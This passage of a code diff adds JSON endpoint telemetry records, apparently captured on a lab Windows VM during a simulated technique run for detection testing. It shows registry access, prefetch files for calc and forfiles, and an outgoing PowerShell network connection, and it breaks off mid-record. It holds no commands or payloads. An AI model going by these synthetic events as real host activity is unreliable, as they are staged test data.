"registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026360000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026380000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026480000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "registry", + "pid": 4052, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\CapabilityAccessManager\\Capabilities", + "registry_value": "Capabilities", + "timestamp": 131883574026480000, + "unique_pid": "{42FC7E13-CBCD-5C05-0000-001051955401}" + }, + { + "event_type": "file", + "file_name": "CALC.EXE-AC08706A.pf", + "file_path": "C:\\Windows\\Prefetch\\CALC.EXE-AC08706A.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574027320000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "FORFILES.EXE-BE58C675.pf", + "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574027350000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "file", + "file_name": "FORFILES.EXE-BE58C675.pf", + "file_path": "C:\\Windows\\Prefetch\\FORFILES.EXE-BE58C675.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574027350000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_value": "Journal", + "timestamp": 131883574035550000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "event_type": "registry", + "pid": 2136, + "process_name": "svchost.exe", + "process_path": "C:\\WINDOWS\\System32\\svchost.exe", + "registry_key": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal", + "registry_path": "HKU\\S-1-5-19\\Software\\Microsoft\\Windows\\CurrentVersion\\Audio\\Journal\\Render", + "registry_value": "Render", + "timestamp": 131883574035550000, + "unique_pid": "{42FC7E13-B2AB-5C05-0000-0010B9AE0100}" + }, + { + "destination_address": "151.101.48.133", + "destination_port": "443", + "event_type": "network", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "protocol": "tcp", + "source_address": "192.168.162.134", + "source_port": "50511", + "subtype": "outgoing", + "timestamp": 131883574030630000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\ShowInSwitchers", + "registry_value": "ShowInSwitchers", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\PositionObject", + "registry_value": "PositionObject", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_value": "Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationFrame\\Positions\\Microsoft.WindowsCalculator_8wekyb3d8bbwe!App\\Version", + "registry_value": "Version", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574055110000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "registry_value": "Zvpebfbsg.JvaqbjfPnyphyngbe_8jrxlo3q8oojr!Ncc", + "timestamp": 131883574055580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574055580000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_value": "WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionInfo\\1\\ApplicationViewManagement\\WRT:Microsoft.WindowsCalculator_8wekyb3d8bbwe!App+4\\VirtualDesktop", + "registry_value": "VirtualDesktop", + "timestamp": 131883574055740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 5824, + "process_name": "SearchIndexer.exe", + "process_path": "C:\\WINDOWS\\system32\\SearchIndexer.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows Search\\Gather\\Windows\\SystemIndex\\NewClientID", + "registry_value": "NewClientID", + "timestamp": 131883574056050000, + "unique_pid": "{42FC7E13-B303-5C05-0000-0010823E0600}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ActivityDataModel\\ReaderRevisionInfo\\C9DD546D-51CE-5F51-47F7-F7BA79663637", + "registry_value": "C9DD546D-51CE-5F51-47F7-F7BA79663637", + "timestamp": 131883574056050000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "file", + "file_name": "AUDIODG.EXE-D0D776AC.pf", + "file_path": "C:\\Windows\\Prefetch\\AUDIODG.EXE-D0D776AC.pf", + "pid": 1692, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "timestamp": 131883574076520000, + "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574081680000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574081680000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\{1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7}\\JvaqbjfCbjreFuryy\\i1.0\\cbjrefuryy.rkr", + "registry_value": "cbjrefuryy.rkr", + "timestamp": 131883574085740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 4744, + "process_name": "Explorer.EXE", + "process_path": "C:\\WINDOWS\\Explorer.EXE", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA", + "registry_value": "HRZR_PGYFRFFVBA", + "timestamp": 131883574085740000, + "unique_pid": "{42FC7E13-B2CF-5C05-0000-001082530400}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574149810016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574149810016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 2688, + "process_name": "vmtoolsd.exe", + "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883574149810016, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883574190430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883574190430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883574190430000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": 